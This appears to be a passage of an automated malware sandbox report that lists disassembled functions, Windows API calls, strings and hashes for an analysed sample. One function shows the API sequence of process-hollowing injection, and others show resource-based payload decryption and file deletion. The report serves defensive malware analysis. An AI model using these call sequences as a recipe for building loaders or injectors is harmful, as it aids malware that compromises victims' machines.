API String ID: 2238633743-4044615076
Opcode ID: 1dbaeefd9ce97f4fa9637ee689c7f71a33f2da17464894628c8e9adf382b8011
Instruction ID: db44e2fe7c464d5a8d4b7f8e029df5005cf0b4a6e2234990c761226e46615e57
Opcode Fuzzy Hash: 1dbaeefd9ce97f4fa9637ee689c7f71a33f2da17464894628c8e9adf382b8011
Instruction Fuzzy Hash: FA018FB5602221AFF702CFB48CD4A5B7BECEB585D23425029F305D3128DF768A019B60

Uniqueness

Uniqueness Score: -1.00%

Function 100034B0 Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringW.KERNEL32(00000000,00000100,100043C0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 100034F2
LCMapStringA.KERNEL32(00000000,00000100,100043BC,00000001,00000000,00000000), ref: 1000350E
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10003557
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 1000358F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 100035E7
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 100035FD
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 10003630
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10003698

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: dbe830df0763fc8bee7db807de57661d9d77bbfedc854cc939856680204d9edb
Instruction ID: 4b6d027f73fa19145a5f3e1c53e93e680a39882d1d293be763fa309d5391f777
Opcode Fuzzy Hash: dbe830df0763fc8bee7db807de57661d9d77bbfedc854cc939856680204d9edb
Instruction Fuzzy Hash: 81517872900249FBEF22CF95CC84A9F7BB9FB487D0F118119FA14A1268D7329A50DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10001D0E Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 10001D7B
GetStdHandle.KERNEL32(000000F4,100042F4,00000000,?,00000000,00000000), ref: 10001E51
WriteFile.KERNEL32(00000000), ref: 10001E58

Strings

Microsoft Visual C++ Runtime Library, xrefs: 10001E27
<program name unknown>, xrefs: 10001D8B
..., xrefs: 10001DCD
Runtime Error!Program: , xrefs: 10001DE1

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: e6a121d48861eb785d742d214c72ab0c014cff8c06758f892024061719bbc7c5
Instruction ID: 401661fd5ab9cabd625a3dc97299db880e9a28a686874f8926fb39faa29cc82c
Opcode Fuzzy Hash: e6a121d48861eb785d742d214c72ab0c014cff8c06758f892024061719bbc7c5
Instruction Fuzzy Hash: E931CFB2A00218AFFF20DBA0CD85FDE73BDEB453C1F510466F644E6058EB70AA448B51

Uniqueness

Uniqueness Score: -1.00%

Function 10001BA3 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F6), ref: 10001BBE
GetEnvironmentStrings.KERNEL32(?,?,?,?,100013F6), ref: 10001BD2
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F6), ref: 10001BFE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,100013F6), ref: 10001C36
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100013F6), ref: 10001C58
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100013F6), ref: 10001C71
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,100013F6), ref: 10001C84
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10001CC2

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: f2918a94f17886a19cbf868265f1ef6e6d0018226b6bb258aafe37188c77b7c3
Instruction ID: b5758dbbf37d0a68a6d2fbbe3b6386a9ccfe2942eff6862e6cb0508b33c02b1e
Opcode Fuzzy Hash: f2918a94f17886a19cbf868265f1ef6e6d0018226b6bb258aafe37188c77b7c3
Instruction Fuzzy Hash: 5231F4B25882666FF310EFB85CC8CAF76DCEB452C47130929FA45D3249EA71DC8187A5

Uniqueness

Uniqueness Score: -1.00%

Function 100036FF Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,100043C0,00000001,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000373E
GetStringTypeA.KERNEL32(00000000,00000001,100043BC,00000001,?), ref: 10003758
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000378C
MultiByteToWideChar.KERNEL32(10002B99,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 100037C4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 1000381A
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 1000382C

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: f64cdc7b7fa6c42fbe7f8f5f482f442825ff80c86c4570330c8ea04e2d4c557e
Instruction ID: c106d8dc8ad574b061a9a187b1fe70b75c126725d83857f186d77a87e2c8d252
Opcode Fuzzy Hash: f64cdc7b7fa6c42fbe7f8f5f482f442825ff80c86c4570330c8ea04e2d4c557e
Instruction Fuzzy Hash: 3E418CB190425AAFEB22CF98DC85EDF7BBCFB086D0F118525FA15E2254D7319910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100016CF Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 10001728
GetFileType.KERNEL32 ref: 100017CE
GetStdHandle.KERNEL32(-000000F6), ref: 10001827
GetFileType.KERNEL32 ref: 10001835
SetHandleCount.KERNEL32 ref: 1000186C

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
Instruction ID: 494b5648a00b6ebd18262675c163e6e7080ce7139c4e1f1a5e36cb56f91cab08
Opcode Fuzzy Hash: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
Instruction Fuzzy Hash: F451D6719082558BF321CB28CC887863BE5FB053E1F5A8768E49A9B2E9DB309945C751

Uniqueness

Uniqueness Score: -1.00%

Function 00401080 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 004010A1
malloc.MSVCRT ref: 0040113A

Strings

TEMP, xrefs: 0040108A
00@, xrefs: 00401103, 00401147

Memory Dump Source

Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd

Similarity

API ID: getenvmalloc
String ID: 00@$TEMP
API String ID: 3016273935-1863785868
Opcode ID: e5752d7e964cc45001351181cb80afe316824892046b893d0cd7ffa74a926f00
Instruction ID: 17352a3b23e8b41dd4c3654eb86734d26610b7628fbd5f895abf2d9db2bed888
Opcode Fuzzy Hash: e5752d7e964cc45001351181cb80afe316824892046b893d0cd7ffa74a926f00
Instruction Fuzzy Hash: F7318DB17052058BC718DF5AEE8006ABBEAE7C83A1B54027FF745A73B0D7758C458B88

Uniqueness

Uniqueness Score: -1.00%

Function 000310A6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 000310D4
_initterm.MSVCRT ref: 000310FF
free.MSVCRT(?,?,00031191,?,?,?), ref: 0003113C

Strings

2t, xrefs: 000310BC

Memory Dump Source

Source File: 00000002.00000002.349477708.0000000000031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000002.00000002.349475197.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.349480216.0000000000032000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30000_Sahofivizu.jbxd

Similarity

API ID: _inittermfreemalloc
String ID: 2t
API String ID: 1678931842-3527913779
Opcode ID: aaa691ac5fd9f91e05aeb056c63f31f7cb1ec05e37e08a05c2c227dbbda0be8e
Instruction ID: 13b689dde038f77e4c4977206f0877c0701b6f0d20176e13f6d107654d309145
Opcode Fuzzy Hash: aaa691ac5fd9f91e05aeb056c63f31f7cb1ec05e37e08a05c2c227dbbda0be8e
Instruction Fuzzy Hash: 14112E31608241DBF76FCB65EDE4BD677BCA709711F104419EA01C6160DB69DA48DF14

Uniqueness

Uniqueness Score: -1.00%

Function 000211F4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00021222
_initterm.MSVCRT ref: 0002124D
free.MSVCRT(00000000,?,000212DF,?,?,?), ref: 0002128A

Strings

2t, xrefs: 0002120A

Memory Dump Source

Source File: 00000002.00000002.349465636.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true

Associated: 00000002.00000002.349463065.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.349468068.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.349470440.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.349472776.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_20000_Sahofivizu.jbxd

Similarity

API ID: _inittermfreemalloc
String ID: 2t
API String ID: 1678931842-3527913779
Opcode ID: 7068a5bc0ea4ce6263cfe8236628994a315b2e641dedb9b323be42eef17fcd8b
Instruction ID: a6225d14362a5a66cbb371df82a878d36f6afbcff67eb9e9200332e41d30c974
Opcode Fuzzy Hash: 7068a5bc0ea4ce6263cfe8236628994a315b2e641dedb9b323be42eef17fcd8b
Instruction Fuzzy Hash: E1112E31604321DBF7748FA8FC95BA677A9B725311B70041AF401DA1A0DB2D9A66CB54

Uniqueness

Uniqueness Score: -1.00%

Function 001B10A6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 001B10D4
_initterm.MSVCRT ref: 001B10FF
free.MSVCRT(?,?,001B1191,?,?,?), ref: 001B113C

Strings

2t, xrefs: 001B10BC

Memory Dump Source

Source File: 00000002.00000002.349490851.00000000001B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000002.00000002.349488449.00000000001B0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.349493345.00000000001B2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.349495824.00000000001B4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b0000_Sahofivizu.jbxd

Similarity

API ID: _inittermfreemalloc
String ID: 2t
API String ID: 1678931842-3527913779
Opcode ID: df25920eb69bac706007cce08af52b14f255b03dbdaef1e5609dc9aec3ae7b49
Instruction ID: b767695bdef2e3079c4fffa2bc2dbcef452161975ec96d01c09b1c8d2ef9800f
Opcode Fuzzy Hash: df25920eb69bac706007cce08af52b14f255b03dbdaef1e5609dc9aec3ae7b49
Instruction Fuzzy Hash: 25118232644200EBD724EF79ECA47A577B0FF04B11B52422DF611C79A0D7359A90CB14

Uniqueness

Uniqueness Score: -1.00%

Function 10002AFA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 10002B0E

Strings

, xrefs: 10002B33
, xrefs: 10002B57

Memory Dump Source

Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
Instruction ID: 003f6447f42cfeb74655a4253d6df3cc11f9e005fddf9b97507d5db6970036ca
Opcode Fuzzy Hash: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
Instruction Fuzzy Hash: DB413A310083A89AFB26CB14DC89FEF7F98EB017C0F1005F5DA85DB05AC7224948DBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Hu25VEa8Dr.exePID: 1724, Parent PID: 920COMMON

Execution Graph

Execution Coverage:	65.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.7%
Total number of Nodes:	69
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00402298 Relevance: 49.1, APIs: 17, Strings: 11, Instructions: 131
libraryloaderinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 004022A9
GetProcAddress.KERNEL32(?,SetThreadContext), ref: 004022E3
GetProcAddress.KERNEL32(?,ResumeThread), ref: 004022F0
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 004022FD
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040230C
GetProcAddress.KERNEL32(00000000), ref: 00402313
GetProcAddress.KERNEL32(?,VirtualAllocEx), ref: 00402320
GetProcAddress.KERNEL32(?,WriteProcessMemory), ref: 0040232D
GetProcAddress.KERNEL32(?,GetThreadContext), ref: 0040233A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00402356
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040235F
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00402372
WriteProcessMemory.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402383
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 004023BB
WriteProcessMemory.KERNELBASE(00000000,?,00000000,00000004,00000000), ref: 004023EF
Wow64SetThreadContext.KERNEL32(?,00010007), ref: 00402408
ResumeThread.KERNELBASE(?), ref: 0040240E

Strings

kernel32.dll, xrefs: 004022A4
(, xrefs: 004023C5
NtUnmapViewOfSection, xrefs: 004022FF
D, xrefs: 004022DA
ResumeThread, xrefs: 004022E5
SetThreadContext, xrefs: 004022C0
VirtualAllocEx, xrefs: 00402315
CreateProcessA, xrefs: 004022F2
GetThreadContext, xrefs: 0040232F
WriteProcessMemory, xrefs: 00402322
ntdll.dll, xrefs: 00402304

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: AddressProc$Process$MemoryWrite$Thread$AllocContextCreateHandleLibraryLoadModuleResumeSectionUnmapViewVirtualWow64
String ID: ($CreateProcessA$D$GetThreadContext$NtUnmapViewOfSection$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$kernel32.dll$ntdll.dll
API String ID: 3764497115-2335503490
Opcode ID: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
Instruction ID: 2101c5929532744fc004e0de8da0dcc076228160c7658ae0236a057b64dc8bda
Opcode Fuzzy Hash: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
Instruction Fuzzy Hash: 4651E471900208AFDB219FA1CD49EEEBBB9FF48704F10406AFA05B61A1D7B59A50DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00402493 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 004024A5, 004024AC, 004024C5

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Crypt$AcquireContextHash$CreateDataDecryptDerive
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 2100064926-291530887
Opcode ID: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
Instruction ID: 6345555bd6a6a2baae484d44cd70709dcbd77d04a333a304fec5576ab75e7cf1
Opcode Fuzzy Hash: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
Instruction Fuzzy Hash: 6A111576901118BBDF219FD5DE49ECFBF7DEF09751F108062B604B20A0D6B14A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00402419 Relevance: 9.0, APIs: 6, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32 ref: 00402431
SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402443
LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402452
LockResource.KERNEL32(00000000,?,?,00000000), ref: 00402459
Sleep.KERNELBASE(00000064,?,?,00000000), ref: 00402463
??2@YAPAXI@Z.MSVCRT ref: 00402471

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Resource$??2@FindLoadLockSizeofSleep
String ID:
API String ID: 3568076173-0
Opcode ID: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
Instruction ID: 703fe47ab0b1aed84f9ae8a5fdc7b2922fb639b0f7b03c34cd0379616ea940cd
Opcode Fuzzy Hash: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
Instruction Fuzzy Hash: 0401A272600221AFC7209F79DD4CE6F7BE9EF8D761F104429FA85E3290D6788880CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402779 Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 330
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,?,?,00000000), ref: 004027B6
??2@YAPAXI@Z.MSVCRT ref: 004027C1

Part of subcall function 00402419: FindResourceA.KERNEL32 ref: 00402431

??3@YAXPAX@Z.MSVCRT ref: 0040283E
??3@YAXPAX@Z.MSVCRT ref: 004029DA
MessageBoxA.USER32 ref: 00402A0B
PathCombineA.SHLWAPI(00000000,00000000,00000688), ref: 00402A56
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A65
PathCombineA.SHLWAPI(00000000,00000000,00000994), ref: 00402A7C
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A85
PathCombineA.SHLWAPI(00000000,00000000,00000890), ref: 00402A9C
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AA5
PathCombineA.SHLWAPI(00000000,00000000,0000078C), ref: 00402ABC
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AC5
PathCombineA.SHLWAPI(00000000,00000000,00000A98), ref: 00402ADC
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AE5
PathCombineA.SHLWAPI(00000000,00000000,00000B9C), ref: 00402AFC
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402B05
??2@YAPAXI@Z.MSVCRT ref: 004027F9

Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
Part of subcall function 00402493: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
Part of subcall function 00402493: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
Part of subcall function 00402493: CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
Part of subcall function 00402493: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515

GetEnvironmentVariableA.KERNEL32(APPDATA,00000000,00000104,?,?,?,?,00000000), ref: 004028A1
PathAppendA.SHLWAPI(00000000,00000064), ref: 004028B2
PathFileExistsA.SHLWAPI(00000000), ref: 004028BF
CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 004028E2
??3@YAXPAX@Z.MSVCRT ref: 00402964
??3@YAXPAX@Z.MSVCRT ref: 00402B56
GetCurrentProcess.KERNEL32(00000000), ref: 00402B65
GetExitCodeProcess.KERNELBASE(00000000), ref: 00402B6C
ExitProcess.KERNEL32 ref: 00402B75

Strings

APPDATA, xrefs: 0040289C
TEMP, xrefs: 004027B1

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Path$File$CombineCryptDelete$??3@$Process$??2@AcquireContextCreateEnvironmentExitHashVariable$AppendCodeCurrentDataDecryptDeriveDirectoryExistsFindMessageResource
String ID: APPDATA$TEMP
API String ID: 543592474-1286462511
Opcode ID: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
Instruction ID: f6e2236e3f10b00cdc1ba35207930b3d891378d713eead9fc05a11d1674366eb
Opcode Fuzzy Hash: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
Instruction Fuzzy Hash: 44C15CB290011CABDF11EBA0CD89EDE77BDEB48304F1440B6EA05B6191DA749B85DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402B8A Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00402BB7
__p__fmode.MSVCRT ref: 00402BCC
__p__commode.MSVCRT ref: 00402BDA
__setusermatherr.MSVCRT ref: 00402C06
_initterm.MSVCRT ref: 00402C1C
__getmainargs.MSVCRT ref: 00402C3F
_initterm.MSVCRT ref: 00402C4F
GetStartupInfoA.KERNEL32 ref: 00402C8E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402CB2
exit.MSVCRT ref: 00402CC2
_XcptFilter.MSVCRT ref: 00402CD4

Memory Dump Source

Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
Instruction ID: 2fb94ac4d71d2bac72fea6894e204766db09a3009eb5ffa048212170574d12fd
Opcode Fuzzy Hash: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
Instruction Fuzzy Hash: 3B413375844348AFE7249FA4DF8DAAD7BB8BB09714F20013BE541B72E1D7B85841CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402150 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT ref: 00402162
??3@YAXPAX@Z.MSVCRT ref: 00402183
??2@YAPAXI@Z.MSVCRT ref: 00402192
LoadLibraryA.KERNEL32(Ntdll.dll), ref: 004021A5
